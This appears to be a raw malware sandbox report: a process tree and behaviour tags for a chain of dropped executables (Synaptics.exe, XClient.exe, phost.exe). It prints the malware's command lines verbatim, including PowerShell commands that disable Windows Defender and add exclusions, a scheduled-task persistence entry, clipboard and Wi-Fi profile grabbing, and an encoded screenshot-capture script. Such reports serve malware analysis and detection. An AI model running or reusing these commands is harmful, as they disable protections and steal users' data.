PID 2844 wrote to memory of 2316	2844	mshta.exe	101
PID 2844 wrote to memory of 2316	2844	mshta.exe	101
PID 2844 wrote to memory of 2316	2844	mshta.exe	101
PID 2316 wrote to memory of 5056	2316	PORNHU~1.EXE	102
PID 2316 wrote to memory of 5056	2316	PORNHU~1.EXE	102
PID 5056 wrote to memory of 3140	5056	cmd.exe	123
PID 5056 wrote to memory of 3140	5056	cmd.exe	123
PID 5056 wrote to memory of 2104	5056	cmd.exe	105
PID 5056 wrote to memory of 2104	5056	cmd.exe	105
PID 5056 wrote to memory of 836	5056	cmd.exe	106
PID 5056 wrote to memory of 836	5056	cmd.exe	106
PID 5056 wrote to memory of 3056	5056	cmd.exe	107
PID 5056 wrote to memory of 3056	5056	cmd.exe	107
PID 3056 wrote to memory of 3172	3056	cmd.exe	108
PID 3056 wrote to memory of 3172	3056	cmd.exe	108
PID 5056 wrote to memory of 1536	5056	cmd.exe	109
PID 5056 wrote to memory of 1536	5056	cmd.exe	109
PID 5056 wrote to memory of 2260	5056	cmd.exe	110
PID 5056 wrote to memory of 2260	5056	cmd.exe	110
PID 1536 wrote to memory of 4192	1536	msedge.exe	111
PID 1536 wrote to memory of 4192	1536	msedge.exe	111
PID 5056 wrote to memory of 448	5056	cmd.exe	112
PID 5056 wrote to memory of 448	5056	cmd.exe	112
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113
PID 1536 wrote to memory of 536	1536	msedge.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2260	attrib.exe
6492	attrib.exe
6152	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4688
- C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"
  2⤵
  - Downloads MZ/PE file
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:5908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Desktop Window Manager.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Manager.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6716
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Manager" /tr "C:\ProgramData\Desktop Window Manager.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5316
- - C:\Users\Admin\AppData\Local\Temp\Files\phost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"
    3⤵
    - Executes dropped EXE
    PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\Files\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      PID:2624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'"
        5⤵
        
        PID:1680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:5176
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2324
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
        5⤵
        
        PID:5180
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4024
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
        6⤵
        
        PID:4440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5188
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5496
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5796
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:5896
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:3172
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:5760
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:3808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5436
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:6044
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5316
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3028
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
        5⤵
        
        PID:6056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6044
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5888
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5896
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:5804
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:5344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:3024
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:6648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5180
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:6832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3808
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6156
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:6184
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:6852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:6228
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:6860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:6300
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6844
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1r1yg2x\f1r1yg2x.cmdline"
        7⤵
        
        PID:6708
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE510.tmp" "c:\Users\Admin\AppData\Local\Temp\f1r1yg2x\CSCD7A38B50AB2B4DCDA52B2972145BEDF.TMP"
        8⤵
        
        PID:6740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:7080
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6372
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:6368
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6492
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6548
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6128
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5828
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2256
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:7108
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:6424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6520
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
